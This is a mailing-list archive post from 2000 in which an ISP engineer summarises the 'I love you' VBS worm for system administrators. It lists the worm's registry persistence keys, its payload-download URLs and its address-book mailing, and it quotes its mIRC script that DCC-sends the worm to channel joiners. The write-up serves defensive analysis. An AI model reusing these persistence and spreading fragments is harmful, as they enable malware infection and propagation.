[OT] VBS Script Summary (I love you)

To: debian-isp@lists.debian.org, debian-user@lists.debian.org
Subject: [OT] VBS Script Summary (I love you)
From: Nathan E Norman <nnorman@midco.net>
Date: Thu, 4 May 2000 10:17:45 -0500
Message-id: <[🔎] 20000504101745.C5719@midco.net>
Mail-followup-to: debian-isp@lists.debian.org, debian-user@lists.debian.org

Put together by Morgan Sarges, one of our engineers.

Regards,

-- 
Nathan Norman         "Eschew Obfuscation"          Network Engineer
GPG Key ID 1024D/51F98BB7            http://home.midco.net/~nnorman/
Key fingerprint = C5F4 A147 416C E0BF AB73  8BEF F0C8 255C 51F9 8BB7

Virus Summary:

Date May 3, 2000, 820am

This script works as listed below:

It has 5 subroutines:
regruns, html, spreadtoemail, listadriv, regruns


First up some registry keys are created:
HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout
HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout 0

	These are associated with windows scripting host

Then, the following file copies occur:

	MSKernel32.vbs, Win32DLL.vbs, LOVE-LETTER-FOR-YOU.TXT.vbs

	These files are copied to wherever the windows scripting host files
	live.  ( I havent worked with windows scripting host)

Next, the following registry keys are created:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dir
system&"\MSKernel32.vbs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DL
L",dirwin&"\Win32DLL.vbs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory

Next, the following is run:
	Randomize
	num = Int((4 * Rnd) + 1)

	Which is a random number generator that cranks out a number between
	1 and 4, inclusive.

A if-else block executes, based on the number generated, and points the users
machine (via Internet Explorer) to one of the following URLs:

The URLs below, also have registry keys created, and the keys are listed
with their respective urls:

http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvs
df7679njbvYT/WIN-BUGSFIX.exe
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page

http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hj
k4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page

http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3
Vbvg/WIN-BUGSFIX.exe
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page

http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdj
hPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page

If this file (WIN-BUGSFIX.exe) has already been pulled, the following
registry key is created:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",do
wnread&"\WIN-BUGSFIX.exe

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:b
lank

(The end result is at this point, IE will start up with blank.htm)

Now, a list of drives is created, and all drives are scanned in the following
manner:

	Any files with .vbs or .vbe extensions (visual basic scripts or exes)
		are written to a list (flat text file)
	Any files with .js .jse .css .wsh .sct .hta 
		are written to another list
	Any files with .jpg .jpeg .mp2 .mp3 extensions are written to another
		list.

Next, the infected system is searched for mirc32.exe, and if it is on the
system, an irc script is created, so that the next time mirc is run,
when the irc server is contacted, the script will dcc send the 3rd file list
(with jpegs and mp3s) to a channel, which listens for these lists.

	The contents of the mirc script are below, in a file called script.ini
		inside the mirc directory tree:

	Please dont edit this script... mIRC will corrupt, if mIRC will
     	corrupt... WINDOWS will affect and will not run correctly. thanks
	;
	;Khaled Mardam-Bey
	;http://www.mirc.com
	;
	n0=on 1:JOIN:#:{
	n1=  /if ( $nick == $me ) { halt }
	n2=  /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM 
	n3=}

Now, another directory search is run based on the 3 file lists built.
Files and folders meeting the criteria above are tagged as infected.

Next, the email propogation begins.  Any program that can make use
of the following registry keys will be checked for address books:

HKEY_CURRENT_USER\Software\Microsoft\WAB\

A temporary address list is created, with a counter
The new email message is formatted and the attachment is hooked up
and the email is dumped to a server.

Once this occurs, the following registry keys are written:
HKEY_CURRENT_USER\Software\Microsoft\WAB\
	under this key, there will be a DWORD with a value of 1,
	and address entry count

If, a user gets to messing with the attachement, the attachment will
ask the user to click on a button to enable AcitveX controls.

If this is successful, the files copied initially, MSKernel32.vbs
may be run.

This is by no means a complete summary.

Ill try to send more info as I dig into the EXE's that are pulled
from the web urls listed above.

Morgan

Attachment: pgp6yrYzAYPYF.pgp
Description: PGP signature

Reply to:

Follow-Ups:
- RE: [OT] VBS Script Summary (I love you)
  - From: wsuetholz@centonline.com

Prev by Date: Re: using nsupdate to add a new zone?
Next by Date: Exim Subject rejection, (I LOVE YOU)
Previous by thread: Re: using nsupdate to add a new zone?
Next by thread: RE: [OT] VBS Script Summary (I love you)
Index(es):
- Date
- Thread